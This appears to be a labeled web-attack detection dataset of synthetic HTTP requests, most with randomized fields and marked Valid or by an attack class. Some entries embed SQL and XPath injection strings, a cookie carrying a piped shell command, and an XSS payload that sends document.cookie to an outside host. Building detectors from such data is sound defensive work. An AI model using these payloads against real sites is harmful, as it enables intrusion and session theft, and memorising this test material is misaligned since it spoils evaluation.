Start - Id: 41817
class: SqlInjection
GET /xodifgGms/xrn2hAniaS/oT2OgjDeNie.II7/s8/jv/iD/ix7culsu7uetETn7m/Itooool/@Xq2/einlie4fco7aedEsb2/3EYf2q5/ewTt.php3?aeftNeq=5vbscript&fa=x%7EeI&eL4YqqI=ebsoupmxupmahte&LbiYrialdlvKEH=ssa2reOagDnes&uhzhf3etsels22z=02235023&SYv9=04474798&e5iayaeEota=260798&Ascript2Ah=dL3IXmVWe3&o8e6Dnlootte=853049&6d1whereySPafgh=xmld8dhttps&passwdN5u=hlslezor%25elaccepttim&onlr9tbrd=0272211&X3xxp_p%uf.Gltmp=%27++OR+++%27myhva%27+++%3D+++%27eobi%27%2B%27iea%27&PmvhstoOoe=t&BaniO9Tnwjdzoc=14830 HTTP/1.1
Host: 61.178.169.239
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: or='t'
Client-ip: 209.250.197.168
Cookie: 6xmlboot.iniNacceptY=8RRlptUila&t;mKra9re0ers=rroEbhasotEt2hel;nsshsyts=Dr7@yahtaccesaon53nd;wqs0hibeiof=Etr
Cookie2: $Version="3"
Date: Wed, 02 Apr 08 04:08:16 CET
ETag: "Dd5MBEp1RkTm.bHVt"
Expect: 100-continue
From: t9iXwsen@4teno.be
If-Modified-Since: Thu, 06 Apr 06 21:41:49 UTC
If-Unmodified-Since: Wed, 05 Jan 05 24:00:08 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: NTLM N2h5aXNYcjhuZWxvOXFrMWFpb3RkcHNybHdmYmFjb2VlaGFz
Authorization: NTLM czB1NG9hYjd0b3RmcnQ4ZWRlZW5venRpNGVyZWl6c254YXNlZXpmbg==
Range: 340098-821
Referer: /zsHm/wct2neh/tj5u/9mElkofu/3iloo.swf
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/5.5 (X11; U; Linux i586 8.6; le-6n; rv:4.6.6) Gecko/79336434
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8410x009
Via: 3.6 58.183.71.51, FTP/4.8 www.xskoNNlo.jpg, FTP/1.2 www.cuejay.jpeg
Transfer-Encoding: compress
Upgrade: jnthhN/3.0, 4TrI/5.5, dn4Tr/7.6, winj/6.3, edst/8.0
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 206.140.252.134
X-Serial-Number: 34361564811
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41817
Start - Id: 21735
class: Valid
GET /uMcaz.N/mgA_IBNDW.D37/ucNXpVLcmyg/CaG2Jdiv/nvI/9wo1yopofetndo5iy.swf?UTnlnientgi=llS&ausxurYhrlJl=ohmaeIenraidust&4nlteeua=iformuE+9%3D%24sadmino&zhl6To=eOrx3&sedloeynj=nenN&cemrerm3frd=1sx9l&fzchiaprIwdn7=d%28dddmetaipassthrug4twnfselecto%26%25y%5B&oxwndarmp1w=uSgqPV7XiT&fWsygne=rgt+k&wyPXB=8159815061&oed9cttms=ej&parSfo=7URECot&btAi3hustO5=dtsoand&amstozwdee=3&r8aQCuAee=nt%24cie6Emacatnrez%29 HTTP/1.0
Host: www.h1bSmlRs.biz
Connection: I2icioh3
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: wsaemwu-yic, u-Gta, en3ppi-tpt5ent;q=0.1
Cache-Control: no-cache
Client-ip: 211.7.17.117
Cookie: naiibTtsrb=w
Cookie2: $Version="8"
Date: Thu, 09 Nov 06 01:45:43 UTC
ETag: "PqpR7XP5.GNrKwl-p@r"
Expect: trmpnktn
From: i774itU@Utatven.fr
If-Modified-Since: Fri, 26 Mar 04 03:43:19 UTC
If-Unmodified-Since: Thu, 20 Dec 07 03:11:09 CET
If-Match: "g.xq5bQnUkFNOnu1q"
If-None-Match: ".@YiD_ZPs0Bvodamc"
If-Range: "UrL2Hr2K-uoq@CST0mI"
Max-Forwards: 7027
MIME-Version: 6.9
Pragma: eiecB=o
Proxy-Authorization: NTLM YnhjaXd1Y2VIY3lJbnplcHNpYVRTZnN0ZW5lczNuZHRqMWxlbmZybGl0cw==
Authorization: Basic YWxjZXN0aXQ6bXdkdm1v
Range: 2-286,124579-86667
Referer: /oha9lN/3yele/YuGireke/crkes/naaeet.css
TE: gzip;q=0.5,trailers
Trailer: Trailer
User-Agent: m-68GC4Ei http://www.s2tiedr.it
UA-CPU: Sparc
UA-Disp: 079,7856,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 632x3686
Via: 2.5 www.nubed.shtml, dea/3.0 www.ceae6RhT.shtml
Transfer-Encoding: deflate
Upgrade: Sih/5.8, znid05/1.0, rex/6.4
Warning: 765 215.219.205.19:25695 "heeythtssiieDoGdrnm" 
X-Forwarded-For: 98.250.132.6
X-Serial-Number: 21815
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21735
Start - Id: 25330
class: Valid
GET /al2Rawgaf6oo/oltneseydnhotwsSer3C/twAv9bpgTtYjaAw/u2jmdsstxral7y2/rOe3iohel/otq2enRsIimdgaWy/87u/d@9utmpGzn/q61HdmV@oc975Piq1.nsf?nptitae=k%40t&n8ldCsquar=e&baantideacol=la3ef&bOea=30027118&yNsohrCeteae=1rclp&F0YXL=nnodenk HTTP/1.1
Host: 225.67.60.59
Connection: close
Accept: application/*;q=0.8, image/*;q=0.0, video/*
Accept-Charset: iso-2022-jp;q=0.2, x-mac-arabic;q=0.5, x-mac-chinesetrad, euc-cn;q=0.5, koi8
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 248.193.88.112
Cookie: imrc7lhd=u;OIcopy49behscriptRp=4Cb8q-;BKIOsvOR=ij1Eh0XFT;aHservices1ZzlogpWe=dcatd;e8tw0sits=eagJaM;ottrruahs3E=406
Cookie2: $Version="6"
Date: Tue, 20 Jun 06 07:24:44 UTC
ETag: "k0yDpisrt@FrTBjdjEE"
Expect: 100-continue
From: hrnme@5lttxYa7.ch
If-Modified-Since: Sun, 07 Jan 07 01:56:10 UTC
If-Unmodified-Since: Sun, 18 Nov 07 02:00:28 CET
If-Match: "pirJeWoRoNmNwkSURaPW"
If-None-Match: *
If-Range: Fri, 25 Sep 09 10:31:47 CET
Max-Forwards: 59
MIME-Version: 0.5
Pragma: nnedIi=3deb
Proxy-Authorization: Basic SGRuYVRtazpiaWxsaQ==
Authorization: NTLM WXRnaW5hYWdhdHJpZXF0QWRSV2k1Z2xxZElsbXdpVGFpb3RlZHNnZQ==
Range: -5,9601-,-779
Referer: /ctRRm8/seyk1ree/avyos/iaeisKe/rphi.jpeg
TE: gzip,trailers,chunked;q=0.8
Trailer: Accept-Language
User-Agent: 0x@krs http://www.aitot.biz
UA-CPU: 68000
UA-Disp: 645,174,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3370x895
Via: FTP/6.5 www.hhq8.html, 5.8 181.7.235.161
Transfer-Encoding: aoe4; rdalfRue=lsnhe
Upgrade: p8e/2.0
Warning: 507 www.m5ctauut.htm "aje7owrp58as" "Wed, 13 Jan 10 11:26:34 GMT"
X-Forwarded-For: 117.22.170.105
X-Serial-Number: 741551473242007
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25330
Start - Id: 44559
class: OsCommanding
GET /hn/b2dalvRN_/dc/iilK6e/g0ilS663sEartdar1/tbTvOFJ/yv/tM/e1x1n.dll?etcmOpli=oainsertz3oiujuaA5q+ijinclude HTTP/1.0
Host: www.uneeh.uk
Connection: keep-alive
Accept-Charset: *
Accept-Language: mnfe-0iLeneat;q=0.2, hi39raeo-s;q=0.4
Cache-Control: enmrMoi=emex
Cookie: YmwMe5olbiho8=bodyev ce0nwinntlrtqmEr;yie0c=29.16.77.77  |    echo "test" >evilfile.txt;mn4R@noder=sfhTx23
Cookie2: $Version="863"
Date: Thu, 28 Apr 05 16:32:40 GMT
Expect: erhnt0
Referer: /nhRa/nezl.jsp
User-Agent: Mozilla/5.7 (compatible; ralxEE2i; Windows NT; rePt)
UA-OS: Linux
UA-Color: color32
Transfer-Encoding: cugs; slvo=ttvy

null

End - Id: 44559
Start - Id: 4262
class: Valid
PUT /dw3O/7xObK-dewinntW/hk9vti/ehixvshawtt0ata/tl/r0.E.css? HTTP/1.1
Content-Length: 38
Content-Language: 8aho
Content-Encoding: compress
Content-Location: http://kWsese.org/ataLstf.nsf
Content-MD5: bHl4YWhnNWF4b291ZjVmbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 Dec 05 16:52:03 CET
Last-Modified: Fri, 15 Jun 07 13:01:08 GMT
Host: www.mro6dtOe.org
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.8, isiri-3342;q=0.5
Accept-Encoding: identity;q=0.9, identity, deflate
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 113.87.214.25
Cookie: e7YhsT4siatnAt3=a5on;MhGBOH0Qhq@=s_Kxd;.Ekopassthru=kCV5d;rponqThn=dEThnOjrnsnoofekm3;aetete7to6eoful=iK5L;meecbitw4ugt=6milfvnaH
Cookie2: $Version="11"
Date: Sun, 05 Sep 04 12:22:10 UTC
ETag: W/"pcvTl5lbQuJNZw@"
Expect: 100-continue
From: 8Ney@toolho89ar.com
If-Modified-Since: Sun, 08 Jun 08 17:09:37 UTC
If-Unmodified-Since: Mon, 24 Nov 08 22:38:46 GMT
If-Match: "_7HlfpgOMnFbsUWoW3kW"
If-None-Match: *
If-Range: *
Max-Forwards: 6925
MIME-Version: 0.5
Pragma: w8irmua='zweSGht'
Proxy-Authorization: Basic MnBJbm1EOnR4b3R4NjE=
Authorization: NTLM M291ZG53bm9ybXNhbWJobGh1aG9kVENpYXFscm5NdHNkc3Vh
Range: 09-
Referer: /Ne0Rpe/sm0t/milste/howoamh/rW9t.php
TE: trailers
Trailer: Transfer-Encoding
User-Agent: o0ttilh
UA-CPU: StrongARM
UA-Disp: 4721,826,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 193x5257
Via: 9todz/7.2 www.gerti.jpg, acrprl/5.5 www.omsxe.tiff, tuw/6.9 186.30.223.15:6757
Transfer-Encoding: deflate
Upgrade: rCap/6.5, Ste5so/0.2
Warning: 347 www.qsorR.gif "nFkicsmeeocyt0r6e" 
X-Forwarded-For: 240.213.181.129
X-Serial-Number: 62285156998436291420
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hiefm=dvktG.c&wbee=fRKeE$en t6qentrm

End - Id: 4262
Start - Id: 48030
class: XSS
GET /ftp8WRBjsW9nhib/n9L3/sqP802Gq4/loGq8AZx/rf0BfSwjuY/uqI.nsf?97x=%3Clink++rel++++%3D++%22stylesheet+++++%22+++++href+%3D++++%22++++javascript%3A++%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.icissi.com%2Fcgi-bin%2Fdeonas.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22+++%3E&tMkns=365&sprlia4kss=ne8ewnryhlScdth&jG1jfte=13&7zopmnd6hwj=08409&Atieyoo=replaceti&wnIvnsdfnhnY=ssY&steiznLehAai=0468515 HTTP/1.0
Host: www.Eait.cz:80
Connection: close
Accept: video/*;q=0.7
Accept-Charset: x-mac-hebrew;q=0.4, x-mac-ce, x-mac-korean;q=0.9, x-mac-ce;q=0.4, hz-gb-2312
Accept-Encoding: identity;q=0.7, deflate;q=0.4, deflate
Accept-Language: *
Cache-Control: min-fresh=7
Client-ip: 27.19.82.202
Cookie: nlriraT=e
Cookie2: $Version="136"
Date: Sat, 14 Feb 09 14:34:59 GMT
ETag: W/"pd.LTRlV-ZS9kKW08_J"
Expect: npRl7Nrr
From: uesois@ewrsoxtt.it
If-Modified-Since: Sat, 23 May 09 04:49:00 GMT
If-Unmodified-Since: Thu, 27 Oct 05 09:03:19 UTC
If-Match: "8wq_NfbHrBPW9mNVe7L"
If-None-Match: *
If-Range: Sat, 24 May 08 17:20:03 GMT
Max-Forwards: 451
MIME-Version: 4.1
Pragma: pLtssn='atoef'
Proxy-Authorization: Digest nc=DD143aEB
Authorization: Digest response="FAEfCADf616eD0Ba8AC58b324117Dcc8"
Range: -605,08388-217,461352-2
Referer: /eiHd7wo/vnAqpD.conf
TE: gzip;q=0.3
Trailer: Accept-Charset
User-Agent: attakgjlr
UA-CPU: PowerPC
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 717x263
Via: 4.5 www.thza.shtml, HTTP/8.2 www.bsomepyt.jpg, 9.8 www.TsiM.tiff
Transfer-Encoding: compress
Upgrade: odv/3.8, cye8/8.2
Warning: 409 www.nwho7d.jpeg "t6otamehitht" "Sat, 04 Sep 04 24:22:06 CET"
X-Forwarded-For: 177.208.72.84
X-Serial-Number: 698729021
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48030
Start - Id: 27659
class: Valid
GET /e9VO8TgM7vv/f9EM/cqlatroe8sqdey.png?tilom5rgqcp9=eu9nqn9y&9KMwDKMI=lsecilsygiIwnetn&eanusuao9=34stdinn&leoawsoogjtxy=nimeetdia9h1mna&ahtww4krh=qus+&escifoodn1e=035221&iteethnedh=512867&teuHr0aib6s=tu6UnmzDakhwhoe&reeroIscj4nfw=54241&0ixz=4m79aJhWCc-&tac=hs%5Da5waBtyirulaa&etyuilt=44789 HTTP/1.1
Host: 238.73.75.190:6219
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-ce;q=0.3, iso-8859-8;q=0.3
Accept-Encoding: gzip, compress;q=0.7
Accept-Language: tnfSgee-dTt, ajool-vaabuh, hn2dg-tpsn;q=0.1
Cache-Control: no-cache
Client-ip: 131.233.135.174
Cookie: hzst8aif=h Jde>i9phpriv9s;dVar=ng;aElo=9CNx@T;2aVimgnode=ncors
Cookie2: $Version="5"
Date: Mon, 17 Apr 06 24:56:38 GMT
ETag: "4D@fFBsreTo_rtpFsp"
Expect: otne0
From: zniNeer@1rRnnnE.cz
If-Modified-Since: Wed, 12 Apr 06 14:00:33 UTC
If-Unmodified-Since: Wed, 03 Dec 08 15:25:57 UTC
If-Match: "OKLs7WKE@I92Z1kDq"
If-None-Match: "bcDDXHpW@p-dk.7FR"
If-Range: Sat, 18 Apr 09 20:35:34 GMT
Max-Forwards: 3616
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="huua"
Authorization: Digest algorithm=qiihktlu
Range: 121-5135,-5
Referer: /ttba.css
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.6 (Machintosh; U; PPC Mac OS X 6.7; ya-Tl; rv:2.4.8) Gecko/67658283
UA-CPU: x86
UA-Disp: 2945,887,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 164x477
Via: 7.1 139.124.107.88, TEne/9.9 19.42.229.130
Transfer-Encoding: gzip
Upgrade: wwAt/6.8, car6/9.6, wu9u/2.0
Warning: 507 5.156.224.31 "lste6eure" "Wed, 20 May 09 14:41:31 UTC"
X-Forwarded-For: 245.208.70.50
X-Serial-Number: 17920523075405
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27659
Start - Id: 49370
class: XPathInjection
GET /_B/iKy/8iQD3Y9.png?oetiw=nEm%2Fouea%2Fsy%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D2%5D++or++%2711hag%27+++%3D++%27&LK_cNf2Lmd1=9ielocationt%286dolma&tliiePdeevh=tr&VaEZpQBS=0175&ol=72&edteuns3ir8=hr-5bhbuaoa&mfctodlrths3be=5030691083&RQb4RN.QK=880873920&NkDfromEthtaccesupdateU=P5qnc&easshtee=ilY4xHzHahhp&-libusystemU=luv&T5ge=s&saae=847745&fjR9btx=killei%3Cifilems+ HTTP/1.1
Host: 41.13.20.6
Connection: close
Accept: audio/*;q=0.6, audio/*;q=0.7
Accept-Charset: euc-kr, x-mac-chinesetrad;q=0.1, iso-8859-5, x-mac-cyrillic, x-mac-icelandic;q=0.2
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 215.24.95.188
Cookie: miu=7stUe<rlx;qi5R2cqta6mtnuy=uljvhxnu;wieEsrqii=eitr;tietotwjase2c8a=874565;ihs=ivo
Cookie2: $Version="846"
Date: Tue, 12 Apr 05 02:26:45 UTC
ETag: W/"RkLd1rvasZXLUSjf"
Expect: Tuxyl=nqqhaaen;tyEptn=rc4e
From: seyi@voosa.st
If-Modified-Since: Thu, 23 Apr 09 02:03:27 GMT
If-Unmodified-Since: Fri, 20 Apr 07 15:09:39 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 11 Oct 04 21:13:36 UTC
Max-Forwards: 0
MIME-Version: 7.0
Pragma: jgosdoiC=pe7rd
Proxy-Authorization: Digest uri=http://efar.be/thtuh/euhhew3a/theOa.conf
Authorization: aDlsB etydii=lzeah4
Range: -9178,535260-09009
Referer: http://www.toieu.it/7zmb/osa6rno/psLqo5ne.mpg
TE: trailers,gzip;q=0.1
Trailer: Pragma
User-Agent: Mozilla/7.7 (Machintosh; U; PPC Mac OS X 6.3; yn-Wa; rv:5.5.8) Gecko/92810557
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3843x971
Via: fbei/9.3 45.8.187.130:6716, lrh3/4.3 116.22.125.83, lSsca0/7.4 20.62.194.40
Transfer-Encoding: identity
Upgrade: fdzt6r/1.6, f4eN8/7.9
Warning: 136 11.147.101.120:8 "azxwWdgjetsnwgt6ecfc" "Sun, 05 Nov 06 18:36:55 GMT"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49370
Start - Id: 22820
class: Valid
GET /n3j8@xkwFUkMP@BMfz5/oDBc9v-L2IRQ/mA5rI.K/s01_-TU1Zvt6KT.@/ms/Udegdu2ri7I/uU/1Rhg0bj9.php3?fsner3tto=13001006&hrFmoiaoET=zessebu5karareh HTTP/1.0
Host: 1.231.136.65
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: max-age=614
Client-ip: 173.3.239.168
Cookie: 06eTDe=la3EnnE;iI=eeTwiebegavm;hrebi=lgoieNmdt;rtnk=d;htacceszBdocumentkCA8B=491203
Cookie2: $Version="458"
Date: Wed, 14 Oct 09 01:03:04 CET
ETag: W/"oSLg.vCUJVD7fTrQ"
Expect: 100-continue
From: ea3t@i3OhaEidC.uk
If-Modified-Since: Sat, 24 Mar 07 03:09:46 UTC
If-Unmodified-Since: Mon, 22 Oct 07 16:18:47 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 02 May 05 19:49:38 UTC
Max-Forwards: 7145
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Basic YzFTb1RyYXM6MVRubm94bmk=
Authorization: Basic bGFpbklhcjphaWRiT3Rtag==
Range: -637
Referer: http://trd8.be/td1tHomn.gz
TE: trailers
Trailer: Upgrade
User-Agent: nOyefsssRsIw
UA-CPU: 68000
UA-Disp: 7936,637,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 612x9972
Via: 7.0 www.ieem1hhe.shtml
Transfer-Encoding: ssrjib
Upgrade: gt7o/0.8
Warning: 800 240.77.225.63 "td5atf" 
X-Forwarded-For: 143.162.53.229
X-Serial-Number: 8712140
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22820
Start - Id: 34927
class: Valid
PUT /ZNFodBZIK385E/rnq5Lk6pp.sh? HTTP/1.1
Content-Length: 203
Content-Language: 5nt,rl
Content-Encoding: deflate
Content-Location: http://www.ajiis.it/rx5ois/wtYmwxn/npjd/laH6nek.swf
Content-MD5: dTJzY0Vzc2FmaW9vdDAzcg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 15 Mar 05 06:45:22 CET
Last-Modified: Fri, 09 Nov 07 23:49:41 GMT
Host: 212.246.13.89
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.6
Accept-Encoding: compress;q=0.3, gzip;q=0.7
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 216.197.175.99
Cookie: D5o_W@=(| l4Otdtlw;eifwkf4cq=57605583;Ot=830626;zhtc=m8ooettsccteeA;phmdiwgAst=yagih2sLtgzuto
Cookie2: $Version="1"
Date: Thu, 02 Jun 05 19:21:57 UTC
ETag: W/"7y6u5C8mh1f8zYKx8"
Expect: 100-continue
From: sdqf@ierMt4h.ch
If-Modified-Since: Mon, 09 Aug 04 08:58:55 CET
If-Unmodified-Since: Tue, 10 May 05 17:45:10 CET
If-Match: "hpqaCLPxlGo.4sEk9"
If-None-Match: "o39brPuviRSJPS1771"
If-Range: *
Max-Forwards: 433
MIME-Version: 6.7
Pragma: eihec=itnhruhE
Proxy-Authorization: Basic cFdvaGVzZTpldkhoVXI=
Authorization: Digest realm
Range: 26302-,-510,4934-
Referer: /t6iohtad/rtrtmRta/irune1/nijn/9E2s.gif
TE: gzip;q=0.2,deflate,trailers
Trailer: If-None-Match
User-Agent: Etrratcselsaea
UA-CPU: x86
UA-Disp: 7242,197,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2377x8201
Via: 8.0 242.252.113.47, 8.1 www.4beod.html
Transfer-Encoding: identity
Upgrade: yeadoo/9.1, ynen/6.6, egnCa/7.9, uis/6.9
Warning: 265 68.227.212.166:78 "moawtiltates" 
X-Forwarded-For: 69.156.101.181
X-Serial-Number: 61683738419
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ecD3=et)Qeiaeia)dsr&bhlubnelih=9&LaExjt15ls4tx=3&vniet=60477637&tnsriahdD=a1t&e6cid=cnsc&eln7=2948066&szDcne4i6gk=7&lXCwR_tDIimgecho0=yptemg&htwbethpwo=409&oialrosa=30927&__XFXd.Punion=2dtqtg&2qmua=2

End - Id: 34927
Start - Id: 4552
class: Valid
POST /Istnc4daintailc/r3qahw3doXVCUw.css? HTTP/1.1
Content-Length: 235
Content-Language: oqjEe,oceL
Content-Encoding: deflate
Content-Location: /nndd/aeviywe/Noio/lvesoel.exe
Content-MD5: ZWJsbnJocjRjNmlQeXJlZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Dec 09 17:31:12 UTC
Last-Modified: Mon, 01 Aug 05 15:41:47 GMT
Host: www.isnJai.uk
Connection: eCpg6d
Accept: audio/x-wav, video/*, text/*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 131.137.11.104
Cookie: FMJc_R4Rl=014833256;qtnQhimgqG=h y;G65@=i@S3yffGOEzt
Cookie2: $Version="1"
Date: Wed, 03 Mar 04 03:35:55 CET
ETag: W/"qeHGrc95g0GImT00kGEh"
Expect: 100-continue
From: rsnydvh6@sezlefn.be
If-Modified-Since: Mon, 16 Jun 08 22:30:42 GMT
If-Unmodified-Since: Thu, 09 Apr 09 17:09:09 UTC
If-Match: "1T5BrFpsza0b8IUBJYOy"
If-None-Match: "XrUWnQ4lAV5M6vc@R5D"
If-Range: Tue, 05 Aug 08 22:14:06 UTC
Max-Forwards: 793
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: uaahe i2mes2rD=Tlhhrotn
Authorization: Digest nc=CA1e9F6D
Range: -574,-888
Referer: http://www.tLthete.net/vneakloi/iito/tie6a/toqem.php3
TE: trailers
Trailer: Host
User-Agent: ehTevi9 (iq8mEhO1; i4sduEk6W; s-yAXbI; xT9qJyL; w9I5hy_9)
UA-CPU: 68000
UA-Disp: 453,6755,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3467x636
Via: 6.8 www.Aiheale.css:29
Transfer-Encoding: compress
Upgrade: 5oSf/8.1, asfrl/0.4, ageuy/4.8
Warning: 574 www.hss2sl6e.png "on5onhiTe8lntsIIeien" 
X-Forwarded-For: 244.206.80.136
X-Serial-Number: 60314
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nymslvhetIfnes=kw3herssiN locationFua&doay7iaan4l=k9&psttonoexxSl=(echo&fp8om35sezu=05757&khtpassjSO4N-=famW9zkTRi&Rpo5jlinkOR-z=eLnio&ohhut=mavdanzso~0oce/1&7souhh5sea5v=025&cwme=5&Irrbt5d=ulfBW-Dp&omhvtr5r2rcihit=auqm@nmGmBpj

End - Id: 4552
Start - Id: 41877
class: SqlInjection
GET /ieh/gW2hB/md2/tlurerua0cari0edo/anwsONre1/yiegswsyihpsa62bu1/tCaVZ_YV/YI.css?edcrskeh8l=%27+++%29+UNION+++++ALL+++++SELECT++wa4+++++%2C+++eoe+++%2C+++eisd961++FROM+islhetaeex+WHERE++++6I0A6+++++NOT++++IN++%28++++%27id9iatotld%27+++%29+++AND+maueumum2v++++NOT+++IN+++%28++++%27ojo%27%29+++++AND++++%27%27++++%3D+%27&heiGhrrd=t227kRj7H&buob4=uVP34nvFsU3&bsl8eeo=h%2Bt&sm=0mocha&jmoai=h HTTP/1.0
Host: www.1trin8.ch
Connection: close
Accept: text/plain;q=0.8
Accept-Charset: euc-tw;q=0.9
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: min-fresh=856
Client-ip: 203.18.145.66
Cookie: rsyoasinsmnaa4=b
Cookie2: $Version="01"
Date: Sun, 11 Dec 05 03:42:44 CET
ETag: "GIV9P1vm4tob1Uo"
Expect: estmtade=iia9d
From: uims2c@rtXh1sbi2a.cz
If-Modified-Since: Tue, 31 May 05 05:38:45 GMT
If-Unmodified-Since: Fri, 23 Sep 05 05:05:41 UTC
If-Match: "U1A5DuR7To-WV15tON"
If-None-Match: *
If-Range: Mon, 01 Nov 04 08:58:29 CET
Max-Forwards: 385
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: NTLM aG91bjd0ZWhzYWRkcmh3ZW95YzA2YWNocnJldHFhbHNub3VhYXdlZGl0M2xyOTE=
Authorization: Basic b2VlZ3c6bmFuSGF6
Range: 2764-93323,17883-91
Referer: http://www.ewLzj.uk/85adi/sd5epaA/ycawste/rhnnaws.bin
TE: deflate;q=0.6,trailers,trailers
Trailer: Date
User-Agent: Mozilla/0.4 (Machintosh; U; PPC 7.2; 9h-tw; rv:7.1.6) Gecko/34353421
UA-CPU: StrongARM
UA-Disp: 9347,2639,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 044x365
Via: 2.0 63.242.122.3, FTP/9.8 www.nlhd.jpg
Transfer-Encoding: deflate
Upgrade: 4sh/4.2, Rdhtih/8.1
Warning: 392 113.130.15.37 "8vRtmnhtkaGbbhnilg" 
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41877
Start - Id: 7969
class: Valid
PUT /9boot.iniY5k/ehyqs/fromxK@4vstyleUBposition/yiCApHHjPqLY9jPwboju.jpg? HTTP/1.1
Content-Length: 280
Content-Language: ntlei,us
Content-Encoding: deflate
Content-Location: http://vrbii6cd.it/hdfne.php3
Content-MD5: Z2RxTm5lN2FlcnQ3UXVFbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 04 Feb 07 14:01:10 UTC
Last-Modified: Fri, 23 Dec 05 02:56:43 CET
Host: www.rdrf.fr
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-8859-8-i;q=0.9, euc-tw, iso-8859-6;q=0.9
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 163.108.182.17
Cookie: rqrF5uGK1=m8ccS23o;openDh14gZ05EZ=rs0;ata2kn=2;bmerbctonnatth=5 t dkh?0vvE p
Cookie2: $Version="034"
Date: Sat, 19 Aug 06 21:18:02 UTC
ETag: "48bdU5dR6znX_hvh0Dm0"
Expect: 100-continue
From: eedf0au@eYilizod8t.de
If-Modified-Since: Sun, 05 Aug 07 12:01:16 UTC
If-Unmodified-Since: Fri, 11 Apr 08 01:51:41 CET
If-Match: *
If-None-Match: "Q-0mHB5YsdXux6g1kisE"
If-Range: "bO4smO9q_DIDByPWQFr"
Max-Forwards: 912
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest uri=http://www.scnaa.gov/eTdEwsi.mdb
Range: -607
Referer: /t7Oa/esem/awanen/mmro/Ve58l.wav
TE: trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.0 (Windows; U; Win 9x 7.8; ha-fz; rv:6.4.1) Gecko/71252061
UA-CPU: MIPS
UA-Disp: 4676,8640,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 094x6003
Via: 0.0 www.ieeur.tiff
Transfer-Encoding: compress
Upgrade: rRndxQ/4.8, m7j2ro/0.4, xec/7.9, aPodde/0.0, lld/6.5
Warning: 583 50.58.211.108 "lh5crmtllesSieanni" "Mon, 08 Jan 07 08:44:59 UTC"
X-Forwarded-For: 8.49.98.213
X-Serial-Number: 56493
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~

